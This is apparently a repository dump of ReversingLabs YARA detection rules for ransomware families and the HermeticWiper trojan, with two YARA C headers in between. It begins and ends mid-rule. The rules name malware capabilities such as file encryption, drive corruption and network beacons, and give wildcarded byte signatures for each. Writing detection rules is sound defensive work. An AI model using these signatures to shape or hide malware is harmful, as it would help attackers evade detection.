?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B 41 | 2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ?? 42 | ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 43 | 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? 44 | ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B 45 | 07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ?? 46 | 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 47 | DE ?? 2A 48 | } 49 | 50 | condition: 51 | uint16(0) == 0x5A4D and 52 | ( 53 | $setup_env 54 | ) and 55 | ( 56 | $find_files 57 | ) and 58 | ( 59 | $encrypt_files 60 | ) 61 | } -------------------------------------------------------------------------------- /src/exp/trojan/Win32.Trojan.HermeticWiper.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Trojan_HermeticWiper : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "HERMETICWIPER" 12 | description = "Yara rule that detects HermeticWiper trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "HermeticWiper" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | $corrupt_physical_drive = { 20 | 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ?? 21 | ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F 22 | 11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ?? 23 | ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 24 | BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ?? 25 | 50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? 
?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 26 | 75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ?? 27 | ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 28 | ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ?? 29 | ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ?? 30 | ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 31 | 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90 32 | 8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? 33 | ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70 34 | ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 35 | 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ?? 36 | ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70 37 | ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89 38 | 4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85 39 | DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ?? 40 | FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E 41 | 5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ?? 42 | 5F 5E 5B 8B E5 5D C2 43 | } 44 | 45 | condition: 46 | uint16(0) == 0x5A4D and 47 | ( 48 | $corrupt_physical_drive 49 | ) 50 | } -------------------------------------------------------------------------------- /src/lib/include/yara/sizedstr.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2014. The YARA Authors. All Rights Reserved. 
3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef _SIZEDSTR_H 31 | #define _SIZEDSTR_H 32 | 33 | #include 34 | #include 35 | 36 | // SIZED_STRING_FLAGS_NO_CASE indicates that the string has been decorated with 37 | // the "nocase" modifier or with the /i modifier in the case of regular 38 | // expressions. 39 | #define SIZED_STRING_FLAGS_NO_CASE 1 40 | 41 | // SIZED_STRING_FLAGS_DOT_ALL is used for strings that contain a regular 42 | // expression that had the /s modifier. 
43 | #define SIZED_STRING_FLAGS_DOT_ALL 2 44 | 45 | 46 | #pragma pack(push) 47 | #pragma pack(1) 48 | 49 | // 50 | // This struct is used to support strings containing null chars. The length of 51 | // the string is stored along the string data. However the string data is also 52 | // terminated with a null char. 53 | // 54 | typedef struct _SIZED_STRING 55 | { 56 | uint32_t length; 57 | uint32_t flags; 58 | 59 | char c_string[1]; 60 | 61 | } SIZED_STRING; 62 | 63 | #pragma pack(pop) 64 | 65 | int ss_compare(SIZED_STRING* s1, SIZED_STRING* s2); 66 | 67 | int ss_icompare(SIZED_STRING* s1, SIZED_STRING* s2); 68 | 69 | bool ss_contains(SIZED_STRING* s1, SIZED_STRING* s2); 70 | 71 | bool ss_icontains(SIZED_STRING* s1, SIZED_STRING* s2); 72 | 73 | bool ss_startswith(SIZED_STRING* s1, SIZED_STRING* s2); 74 | 75 | bool ss_istartswith(SIZED_STRING* s1, SIZED_STRING* s2); 76 | 77 | bool ss_endswith(SIZED_STRING* s1, SIZED_STRING* s2); 78 | 79 | bool ss_iendswith(SIZED_STRING* s1, SIZED_STRING* s2); 80 | 81 | SIZED_STRING* ss_dup(SIZED_STRING* s); 82 | 83 | SIZED_STRING* ss_new(const char* s); 84 | 85 | SIZED_STRING* ss_convert_to_wide(SIZED_STRING* s); 86 | 87 | #endif 88 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Crypmic.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_Crypmic : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "CRYPMIC" 12 | description = "Yara rule that detects Crypmic ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Crypmic" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $search_and_encrypt_1 = { 21 | 55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? 22 | ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 
6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7 23 | 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33 24 | C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ?? 25 | ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43 26 | ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? 27 | ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2 28 | 33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ?? 29 | 0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ?? 30 | ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85 31 | C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47 32 | } 33 | 34 | $search_and_encrypt_2 = { 35 | 33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ?? 36 | F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ?? 37 | ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ?? 38 | EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F 39 | 85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D 40 | ?? 8B 75 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ?? 41 | ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ?? 42 | ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40 43 | 89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? 44 | ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8 45 | ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF 46 | 33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66 47 | 3B F1 75 ?? 8B 75 ?? FF 75 ?? 
8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ?? 48 | ?? ?? E9 49 | } 50 | 51 | condition: 52 | uint16(0) == 0x5A4D and 53 | ( 54 | (all of ($search_and_encrypt_*)) 55 | ) 56 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_TimeCrypt : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "TIMECRYPT" 12 | description = "Yara rule that detects TimeCrypt ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "TimeCrypt" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73 22 | ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 23 | 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? 24 | ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? 25 | ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 26 | 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? 27 | ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 28 | ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73 29 | ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? 30 | ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? 31 | ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A 32 | } 33 | 34 | $encrypt_files = { 35 | 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F 36 | ?? ?? ?? 
?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F 37 | ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A 38 | } 39 | 40 | $send_http_request = { 41 | 1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? 42 | ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 43 | 03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? 44 | ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F 45 | ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A 46 | } 47 | 48 | $send_dns_request = { 49 | 1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19 50 | 72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 51 | 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 52 | 26 DE ?? 26 DE ?? 2A 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and 57 | ( 58 | $find_files 59 | ) and 60 | ( 61 | $encrypt_files 62 | ) and 63 | ( 64 | $send_http_request 65 | ) and 66 | ( 67 | $send_dns_request 68 | ) 69 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_GhosTEncryptor : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "GHOSTENCRYPTOR" 12 | description = "Yara rule that detects GhosTEncryptor ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "GhosTEncryptor" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $enum_folders = { 21 | 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ?? 22 | 07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 
09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? 23 | ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 24 | 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? 25 | ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ?? 26 | ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ?? 27 | ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A 28 | } 29 | 30 | $encrypt_folder_p1 = { 31 | 1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? 32 | ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 33 | ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? 34 | A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72 35 | } 36 | 37 | $encrypt_folder_p2 = { 38 | A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13 39 | ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 40 | 32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 41 | 32 ?? 2A 42 | } 43 | 44 | $deep_search_p1 = { 45 | 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ?? 46 | ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 47 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? 48 | ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 49 | } 50 | 51 | $deep_search_p2 = { 52 | 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F 53 | ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28 54 | ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E 55 | 69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 
2A 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | $enum_folders 62 | ) and 63 | ( 64 | all of ($deep_search_p*) 65 | ) and 66 | ( 67 | all of ($encrypt_folder_p*) 68 | ) 69 | } -------------------------------------------------------------------------------- /src/lib/include/yara/endian.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2016. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_ENDIAN_H 31 | #define YR_ENDIAN_H 32 | 33 | #include 34 | 35 | #if defined(__has_builtin) 36 | #if __has_builtin(__builtin_bswap16) 37 | #define yr_bswap16(x) __builtin_bswap16(x) 38 | #endif 39 | #endif 40 | 41 | #if !defined(yr_bswap16) && defined(_MSC_VER) 42 | #define yr_bswap16(x) _byteswap_ushort(x) 43 | #endif 44 | 45 | #if !defined(yr_bswap16) 46 | uint16_t _yr_bswap16(uint16_t x); 47 | #define yr_bswap16(x) _yr_bswap16(x) 48 | #endif 49 | 50 | #if defined(__has_builtin) 51 | #if __has_builtin(__builtin_bswap32) 52 | #define yr_bswap32(x) __builtin_bswap32(x) 53 | #endif 54 | #endif 55 | 56 | #if !defined(yr_bswap32) && defined(_MSC_VER) 57 | #define yr_bswap32(x) _byteswap_ulong(x) 58 | #endif 59 | 60 | #if !defined(yr_bswap32) 61 | uint32_t _yr_bswap32(uint32_t x); 62 | #define yr_bswap32(x) _yr_bswap32(x) 63 | #endif 64 | 65 | #if defined(__has_builtin) 66 | #if __has_builtin(__builtin_bswap64) 67 | #define yr_bswap64(x) __builtin_bswap64(x) 68 | #endif 69 | #endif 70 | 71 | #if !defined(yr_bswap64) && defined(_MSC_VER) 72 | #define yr_bswap64(x) _byteswap_uint64(x) 73 | #endif 74 | 75 | #if !defined(yr_bswap64) 76 | uint64_t _yr_bswap64(uint64_t x); 77 | #define yr_bswap64(x) _yr_bswap64(x) 78 | #endif 79 | 80 | #if defined(WORDS_BIGENDIAN) 81 | #define yr_le16toh(x) yr_bswap16(x) 82 | #define yr_le32toh(x) yr_bswap32(x) 83 | #define yr_le64toh(x) yr_bswap64(x) 84 | #define yr_be16toh(x) 
(x) 85 | #define yr_be32toh(x) (x) 86 | #define yr_be64toh(x) (x) 87 | #else 88 | #define yr_le16toh(x) (x) 89 | #define yr_le32toh(x) (x) 90 | #define yr_le64toh(x) (x) 91 | #define yr_be16toh(x) yr_bswap16(x) 92 | #define yr_be32toh(x) yr_bswap32(x) 93 | #define yr_be64toh(x) yr_bswap64(x) 94 | #endif 95 | 96 | #endif 97 | -------------------------------------------------------------------------------- /src/exp/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara: -------------------------------------------------------------------------------- 1 | rule Bytecode_MSIL_Ransomware_CobraLocker : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "COBRALOCKER" 12 | description = "Yara rule that detects CobraLocker ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "CobraLocker" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ?? 22 | ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 23 | 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? 24 | ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 25 | 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02 26 | 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ?? 27 | 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ?? 28 | ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD 29 | ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06 30 | 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A 31 | } 32 | 33 | $find_files = { 34 | 16 28 ?? ?? ?? ?? 0A 72 ?? ?? 
